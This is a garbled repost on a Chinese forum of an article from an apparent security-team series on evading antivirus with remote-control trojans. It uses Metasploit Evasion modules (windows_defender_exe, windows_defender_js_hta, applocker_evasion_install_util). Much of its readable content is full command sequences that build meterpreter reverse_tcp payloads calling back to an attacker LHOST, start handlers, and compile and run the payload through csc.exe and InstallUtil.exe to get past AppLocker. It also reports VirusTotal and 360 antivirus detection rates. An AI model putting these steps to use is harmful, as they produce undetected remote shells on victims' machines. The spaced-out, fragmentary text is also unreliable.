搜索

[26917] 2020-02-19_远控免杀专题文章(4)-Evasion模块免杀(VT免杀率1271)

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-02-19_远控免杀专题文章(4)-Evasion模块免杀(VT免杀率1271) ( 4 ) - E v a s i o n ( V T 1 2 / 7 1 ) M s 0 8 0 6 7   2 0 2 0 - 0 2 - 1 9 T i d e   1 ( 1 ) - h t t p s : / / m p . w e i x i n . q q . c o m / s / 3 L Z _ c j 2 g D C 1 b Q A T x q B f w e g 2 ( 2 ) - m s f v e n o m h t t p s : / / m p . w e i x i n . q q . c o m / s / 1 r 0 i a k L p n L r j C r O p 2 g T 1 0 w 3 ( 3 ) - m s f ( V T 3 5 / 6 9 ) h t t p s : / / m p . w e i x i n . q q . c o m / s / A 0 C Z s l L h C L O K _ H g k H G c p E A 4 ( 4 ) - E v a s i o n ( V T 1 2 / 7 1 ) 1     B y p a s s 2 p a y l o a d 使 使 m s f 3 3 6 0 3 6 0 + 3 6 0 ( 2 0 1 9 . 1 2 . 1 2 ) ( 2 0 1 9 . 1 2 . 1 2 ) 3 6 0 T i d e   . T i d e W e b / / A I h t t p s : / / g i t h u b . c o m / T i d e S e c / B y p a s s A n t i V i r u s w i n d o w s / m e t e r p e r t e r / r e v e r s e _ t c p 5 . 0 . 0 . 8 1 6 0 5 . 0 . 3 3 . 1 3 1 2 . 0 . 0 . 2 0 0 1
( 2 0 1 9 . 1 2 . 1 7 ) 4 V T 线 线 2 0 1 9 1 m e t a s p l o i t 5 . 0 E v a s i o n e v a s i o n , 使 e x e ( V T 4 2 / 7 1 ) 使 p a y l o a d 线 v i r u s t o t a l . c o m s h o w   e v a s i o n u s e   w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e m s f 5   >   u s e   w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e m s f 5   e v a s i o n ( w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e )   >   s e t   f i l e n a m e   p a y l o a d . e x e m s f 5   e v a s i o n ( w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e )   >   s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f 5   e v a s i o n ( w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e )   >   s e t   L H O S T   1 0 . 2 1 1 . 5 5 . 3 m s f 5   e v a s i o n ( w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e )   >   s e t   L P O R T   3 3 3 3 m s f 5   e v a s i o n ( w i n d o w s / w i n d o w s _ d e f e n d e r _ e x e )   >   r u n h a n d l e r   - H   1 0 . 2 1 1 . 5 5 . 2   - P   3 3 3 3   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p
3 6 0 3 6 0 v i r u s t o t a l . c o m 4 2 / 7 1 3 9 . . .
h t a ( V T 1 4 / 5 9 ) e v a s i o n 3 6 0 w i n d o w s / w i n d o w s _ d e f e n d e r _ j s _ h t a
+ 线
v i r u s t o t a l . c o m 1 4 / 5 9 线 3 6 0 线
i n s t a l l _ u t i l ( V T 1 2 / 7 1 ) e v a s i o n p a y l o a d 使 c s c . e x e c s c . e x e . N E T   F r a m e w o r k   C # . n e t v s 2 0 1 7 c s c . e x e i n s t a l l _ u t i l . e x e w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l m s f 5   >   u s e   w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l m s f 5   e v a s i o n ( w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l )   >   s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p p a y l o a d   = >   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p m s f 5   e v a s i o n ( w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l )   >   s e t   l h o s t   1 0 . 2 1 1 . 5 5 . 2 l h o s t   = >   1 0 . 2 1 1 . 5 5 . 2 m s f 5   e v a s i o n ( w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l )   >   s e t   l p o r t   3 3 3 3 l p o r t   = >   3 3 3 3 m s f 5   e v a s i o n ( w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l )   >   r u n [ + ]   i n s t a l l _ u t i l . t x t   s t o r e d   a t   / U s e r s / x y s o u l / . m s f 4 / l o c a l / i n s t a l l _ u t i l . t x t [ * ]   C o p y   i n s t a l l _ u t i l . t x t   t o   t h e   t a r g e t [ * ]   C o m p i l e   u s i n g :   C : W i n d o w s M i c r o s o f t . N e t F r a m e w o r k [ . N E T   V e r s i o n ] c s c . e x e   / o u t : i n s t a l l _ u t i l . e x e   i n s t a l l _ u t i l . t x t [ * ]   E x e c u t e   u s i n g :   C : W i n d o w s M i c r o s o f t . N e t F r a m e w o r k [ . N E T   V e r s i o n ] I n s t a l l U t i l . e x e   / l o g f i l e =   / L o g T o C o n s o l e = f a l s e   / U   i n s t a l l _ u t i l . e x e I n s t a l l U t i l . e x e
使 3 2 p a y l o a d 3 2 . n e t I n s t a l l U t i l 3 6 0 i n s t a l l _ u t i l . e x e I n s t a l l U t i l . e x e   / l o g f i l e =   / L o g T o C o n s o l e = f a l s e   / U   i n s t a l l _ u t i l . e x e
v i r u s t o t a l . c o m 1 2 / 7 1 e v a s i o n 6 c s c p a y l o a d 2 0 1 9 1 m s f 5 e v a s i o n 使 : C s c . e x e p a y l o a d i n s t a l l _ u t i l . e x e M e t a s p l o i t : : F r a m e w o r k : : C o m p i l e r a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l . m d h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / b l o b / m a s t e r / d o c u m e n t a t i o n / m o d u l e s / e v a s i o n / w i n d o w s / a p p l o c k e r _ e v a s i o n _ i n s t a l l _ u t i l . m d h t t p s : / / m i c r o 8 . g i t b o o k . i o / m i c r o 8 / c o n t e n t s - 1 / 7 1 - 8 0 / 7 7 - j i - y u - b a i - m i n g - d a n - c s c . e x e - z h i - h a n g - p a y l o a d - d i - q i - j i
W E B M s 0 8 0 6 7 W e b P y t h o n J A V A C T F A P T w w w . m s 0 8 0 6 7 . c o m
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理